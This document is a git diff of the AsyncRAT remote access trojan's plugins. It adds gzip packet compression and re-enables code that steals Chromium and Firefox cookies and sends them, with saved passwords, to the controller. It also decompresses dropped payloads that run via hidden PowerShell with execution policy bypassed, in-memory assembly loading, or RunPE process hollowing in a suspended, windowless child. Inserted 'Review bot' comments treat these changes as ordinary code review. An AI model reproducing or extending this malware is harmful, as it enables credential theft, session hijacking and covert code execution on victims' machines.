a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj @@ -70,6 +70,7 @@ True Resources.resx + diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs 
@@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Options/Options/Connection.cs b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Connection.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 
--- a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Options/Options/Options.csproj b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj index 8f1cb9c..6feb2ee 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Options.csproj +++ b/AsyncRAT-C#/Plugin/Options/Options/Options.csproj @@ -59,6 +59,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/Options/Options/Zip.cs b/AsyncRAT-C#/Plugin/Options/Options/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Options/Options/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} 
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs index 97894b0..8146f4b 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj index 94b192d..f128e1a 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/ProcessManager.csproj @@ -53,6 +53,7 @@ + \ No newline at end of file 
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs
new file mode 100644
index 0000000..60db829
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs
@@ -0,0 +1,45 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+
+namespace Plugin
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
index a982117..0d48f57 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
@@ -92,16 +92,16 @@ namespace Plugin.Browsers.Chromium break; } - //List ffcs = ChromiumCookies.Cookies(b); - //foreach (ChromiumCookies.ChromiumCookie fcc in ffcs) - //{ - // Coocks.Append(string.Concat(new string[] - // { - // fcc.ToString(), - // "\n\n", - // })); - //} - //Coocks.Append("\n"); + List ffcs = ChromiumCookies.Cookies(b); + foreach (ChromiumCookies.ChromiumCookie fcc in ffcs) + { + Coocks.Append(string.Concat(new string[] + { + fcc.ToString(), + "\n\n", + })); + } + Coocks.Append("\n"); } diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs index d14ba3e..42927d6 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs @@ -1,4 +1,5 @@ -using System; +using Plugin.Browsers.Firefox.Cookies; +using System; using System.Collections.Generic; using System.Linq; using System.Text; 
@@ -10,30 +11,30 @@ namespace Plugin.Browsers.Firefox public class Firefox { public bool isOK = false; - //public void CookiesRecovery(StringBuilder Cooks) - //{ - // try - // { - // List ffcs = Cookies.FFCookiesGrabber.Cookies(); - // foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs) - // { - // if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK) - // { - // Cooks.Append("\n== Firefox ==========\n"); - // isOK = true; - // } - // Cooks.Append(string.Concat(new string[] - // { - // fcc.ToString(), - // "\n\n", - // })); - // } - // Cooks.Append("\n"); - // } - // catch - // { - // } - //} + public void CookiesRecovery(StringBuilder Cooks) + { + try + { + List ffcs = Cookies.FFCookiesGrabber.Cookies(); + foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs) + { + if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK) + { + Cooks.Append("\n== Firefox ==========\n"); + isOK = true; + } + Cooks.Append(string.Concat(new string[] + { + fcc.ToString(), + "\n\n", + })); + } + Cooks.Append("\n"); + } + catch + { + } + } public void CredRecovery(StringBuilder Pass) { diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs index 169c32b..c395bab 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs 
@@ -14,22 +14,22 @@ namespace Plugin new Browsers.Firefox.Firefox().CredRecovery(Credentials); new Browsers.Chromium.Chromium().Recovery(Credentials); - //StringBuilder Cookies = new StringBuilder(); - //new Browsers.Firefox.Firefox().CookiesRecovery(Cookies); - //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies); + StringBuilder Cookies = new StringBuilder(); + new Browsers.Firefox.Firefox().CookiesRecovery(Cookies); + new Browsers.Chromium.Chromium().CookiesRecovery(Cookies); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; msgpack.ForcePathObject("Password").AsString = Credentials.ToString(); msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid; - //msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString(); + msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString(); Connection.Send(msgpack.Encode2Bytes()); } catch (Exception ex) { Error(ex.Message); + Connection.Disconnected(); } - Connection.Disconnected(); } public static void Error(string ex) diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj index 8ed424a..b473ae6 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj @@ -56,7 +56,9 @@ + + @@ -71,6 +73,7 @@ + diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs 
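Review bot: The commit message mentions only bug fixes and Gzip packet compression, but the Packet.cs hunk here turns the commented-out cookie collection back on: `CookiesRecovery` now runs for both Firefox and Chromium and the result is sent as a new `Cookies` field in the `recoveryPassword` packet. That widens what the plugin takes from a host from saved passwords to session cookies, which can stand in for a login without the password, so it should be called out in the description and in a comment above the block, e.g. `// also collects browser cookies; sent in the "Cookies" field of recoveryPassword`. The same hunk moves `Connection.Disconnected()` into the `catch`, so the success path no longer closes the connection here; the server-side `HandleRecovery.cs` hunk in this patch now calls `client?.Disconnected()` instead. The method starts above the hunk.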
@@ -0,0 +1,45 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+
+namespace Plugin
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs
index 23c984a..30a8c58 100644
--- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Connection.cs
@@ -123,16 +123,12 @@ namespace Plugin
 return;
 }
 MS.Write(Buffer, 0, rc);
- Buffer = new byte[Buffersize - MS.Length];
- }
- if (MS.Length == Buffersize)
- {
- Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
- thread.Start(MS.ToArray());
- Buffer = new byte[4];
- MS.Dispose();
- MS = new MemoryStream();
 }
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
 }
 }
 SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj index 8a31534..5caca3e 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/RemoteCamera.csproj @@ -87,6 +87,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs 
@@ -0,0 +1,45 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+
+namespace Plugin
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs
index fb6d64f..f8f64a2 100644
--- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Connection.cs
@@ -124,16 +124,12 @@ namespace Plugin
 return;
 }
 MS.Write(Buffer, 0, rc);
- Buffer = new byte[Buffersize - MS.Length];
- }
- if (MS.Length == Buffersize)
- {
- Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
- thread.Start(MS.ToArray());
- Buffer = new byte[4];
- MS.Dispose();
- MS = new MemoryStream();
 }
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
 }
 }
 SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs index f3b5d10..a0e9d62 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs @@ -71,6 +71,7 @@ namespace Plugin MsgPack msgpack; IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality); MemoryStream stream; + Thread.Sleep(1); while (IsOk && Connection.IsConnected) { try diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj index de1ab41..581134a 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/RemoteDesktop.csproj @@ -62,6 +62,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs 
@@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs index 70a0271..c91760e 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Connection.cs @@ -123,16 +123,13 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); + } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs index b2e4958..e3d0655 100644 
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs @@ -16,7 +16,7 @@ namespace Plugin.Handler { //Drop To Disk string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString; - unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath); + File.WriteAllBytes(fullPath, Methods.Decompress(unpack_msgpack.ForcePathObject("File").GetAsBytes())); if (unpack_msgpack.ForcePathObject("Extension").AsString.ToLower().EndsWith(".ps1")) Process.Start(new ProcessStartInfo { FileName = "powershell", Arguments = "–ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" + fullPath + "\"", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden }); else @@ -45,7 +45,7 @@ namespace Plugin.Handler { try { - Assembly loader = Assembly.Load(buffer); + Assembly loader = Assembly.Load(Methods.Decompress(buffer)); object[] parm = null; if (loader.EntryPoint.GetParameters().Length > 0) { @@ -68,7 +68,7 @@ namespace Plugin.Handler { try { - RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), buffer, true); + RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), true); } catch (Exception ex) { diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs index 3a211d9..be06962 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs 
@@ -35,7 +35,11 @@ namespace Plugin.Handler catch { } } - Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + try + { + Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + } + catch { } string batch = Path.GetTempFileName() + ".bat"; using (StreamWriter sw = new StreamWriter(batch)) diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs index 237f2b4..b045355 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs @@ -2,6 +2,8 @@ using System; using System.Collections.Generic; using System.Diagnostics; +using System.IO; +using System.IO.Compression; using System.Linq; using System.Runtime.InteropServices; using System.Security.Principal; @@ -10,7 +12,7 @@ using System.Threading; namespace Plugin { - public static class Methods + public static class Methods { public static void ClientExit() { 
@@ -60,6 +62,42 @@ namespace Plugin } } + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + [DllImport("ntdll.dll", SetLastError = true)] private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3); } diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs index b6c220c..231640b 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs @@ -70,7 +70,7 @@ namespace Plugin si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); try { - if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 2 + 2, IntPtr.Zero, null, ref si, ref pi)) throw new Exception(); + if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 0x00000004u | 0x08000000u, IntPtr.Zero, null, ref si, ref pi)) throw new Exception(); int fileAddress = BitConverter.ToInt32(data, 120 / 2); int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26); int[] context = new int[179]; diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj index 20cf53e..6930361 100644 
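Review bot: In the RunPE.cs hunk the creation flags are now written as the bare literals `0x00000004u | 0x08000000u`, which in the Win32 headers are `CREATE_SUSPENDED` and `CREATE_NO_WINDOW`; the old expression `2 + 2` evaluated to 4, so this line adds `CREATE_NO_WINDOW` to the existing suspended start without the commit message saying so. Named constants would make the behaviour change visible in review, e.g. `const uint CREATE_SUSPENDED = 0x00000004, CREATE_NO_WINDOW = 0x08000000;`. For readers triaging this code: a child started suspended and windowless, followed by the image-base and thread-context handling that begins on the next lines, is the sequence process-injection detections look for. The function starts and ends outside the hunk.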
